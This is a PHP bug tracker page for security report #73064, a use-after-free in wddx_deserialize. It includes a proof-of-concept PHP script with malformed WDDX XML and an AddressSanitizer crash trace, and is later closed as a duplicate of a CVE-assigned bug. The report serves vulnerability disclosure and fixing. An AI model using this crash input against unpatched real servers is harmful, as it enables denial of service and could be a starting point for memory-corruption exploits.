php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #73064 Use-After-Free in wddx_deserialize of wddx.c
Submitted: 2016-09-12 02:21 UTC Modified: 2017-02-13 01:22 UTC
From: stackexploit at gmail dot com Assigned: stas
Status: Duplicate Package: WDDX related
PHP Version: master-Git-2016-09-12 (snap) OS: Ubuntu
Private report: No CVE-ID:
 [2016-09-12 02:21 UTC] stackexploit at gmail dot com
Description:
------------
CREDIT
-----------------------
This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.


PHP VERSION
-----------------------
./sapi/cli/php --version
PHP 7.2.0-dev (cli) (built: Sep 11 2016 18:37:49) ( NTS )
Copyright (c) 1997-2016 The PHP Group
Zend Engine v3.1.0-dev, Copyright (c) 1998-2016 Zend Technologies


PROOF-OF-CONCEPT FILE
-----------------------
Posted in the "Test script" section.


STACKTRACE
-----------------------
Posted in the "Actual result" section.


VULNERABILITY DETAILS
-----------------------
An Use-After-Free vulnerability can be triggered in function wddx_deserialize. 
To reproduce this issue, please run export USE_ZEND_ALLOC=0 before executing the test script.

Test script:
---------------
<?php
    $xml = <<<XML
<?xml version='1.0'?>
    <wEdxPacket ver='1.0'><er/>
        <data>
            <struct>
                <recordset rowt='1' fieldNames='keliu'>
                <field name='keliu'>
                <var name='php_class_name<binary>'>
                    <string>lab</string>
                </var>
            </struct>
        </data>
    </jddxPacket>
XML;
    
    $array = wddx_deserialize($xml);
    var_dump($array);
?>

Expected result:
----------------
Exit quietly.

Actual result:
--------------
==47659==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000a4c0 
    at pc 0x000000ca6599 bp 0x7ffd3028b0e0 sp 0x7ffd3028b0d8
READ of size 4 at 0x60600000a4c0 thread T0
    #0 0xca6598 in zval_delref_p php-src/Zend/zend_types.h:834:9
    #1 0xca6598 in i_zval_ptr_dtor php-src/Zend/zend_variables.h:47
    #2 0xca6598 in _zval_ptr_dtor php-src/Zend/zend_execute_API.c:550
    #3 0xac1962 in wddx_stack_destroy php-src/ext/wddx/wddx.c:233:4
    #4 0xac1962 in php_wddx_deserialize_ex php-src/ext/wddx/wddx.c:1097
    #5 0xabad7a in zif_wddx_deserialize php-src/ext/wddx/wddx.c:1299:2
    #6 0xfdfb3d in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER php-src/Zend/zend_vm_execute.h:675:2
    #7 0xe75f4b in execute_ex php-src/Zend/zend_vm_execute.h:432:7
    #8 0xe76ec3 in zend_execute php-src/Zend/zend_vm_execute.h:474:2
    #9 0xd00e9e in zend_execute_scripts php-src/Zend/zend.c:1464:4
    #10 0xad4425 in php_execute_script php-src/main/main.c:2537:14
    #11 0x10fca26 in do_cli php-src/sapi/cli/php_cli.c:990:5
    #12 0x10f9f60 in main php-src/sapi/cli/php_cli.c:1378:18
    #13 0x7f540a3b382f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #14 0x449578 in _start (php-src/sapi/cli/php+0x449578)

0x60600000a4c0 is located 0 bytes inside of 56-byte region [0x60600000a4c0,0x60600000a4f8)
freed by thread T0 here:
    #0 0x4e9520 in __interceptor_cfree.localalias.0 (php-src/sapi/cli/php+0x4e9520)
    #1 0xbed9e6 in _efree_56 php-src/Zend/zend_alloc.c:2367:1
    #2 0xabad7a in zif_wddx_deserialize php-src/ext/wddx/wddx.c:1299:2
    #3 0xfdfb3d in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER php-src/Zend/zend_vm_execute.h:675:2

previously allocated by thread T0 here:
    #0 0x4e96a8 in __interceptor_malloc (php-src/sapi/cli/php+0x4e96a8)
    #1 0xbe92a1 in _emalloc_56 php-src/Zend/zend_alloc.c:2325:1

SUMMARY: AddressSanitizer: heap-use-after-free php-src/Zend/zend_types.h:834:9 in zval_delref_p
Shadow bytes around the buggy address:
  0x0c0c7fff9440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9460: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9470: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c7fff9480: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c0c7fff9490: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fa
  0x0c0c7fff94a0: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c0c7fff94b0: fd fd fd fd fd fd fd fa fa fa fa fa 00 00 00 00
  0x0c0c7fff94c0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa
  0x0c0c7fff94d0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
  0x0c0c7fff94e0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==47659==ABORTING

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-09-12 02:33 UTC] stas@php.net
-Status: Open +Status: Duplicate
 [2016-09-12 02:33 UTC] stas@php.net
Seems to be duplicate of bug #72860, fixed by https://gist.github.com/anonymous/4f730c88f90c15b0216e8651af525972
 [2016-09-16 09:25 UTC] stackexploit at gmail dot com
-Status: Duplicate +Status: Closed
 [2016-09-16 09:25 UTC] stackexploit at gmail dot com
Close this issue since bug #72860 (https://bugs.php.net/bug.php?id=72860) can has been closed. 

BTW, bug #72860 has been assigned CVE-2016-7413.
 [2016-09-18 02:11 UTC] stackexploit at gmail dot com
Could you please help make this issue accessible publicly?
 [2016-09-18 06:15 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2017-02-13 01:22 UTC] stas@php.net
-Status: Closed +Status: Duplicate
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Thu Aug 17 08:02:00 2017 UTC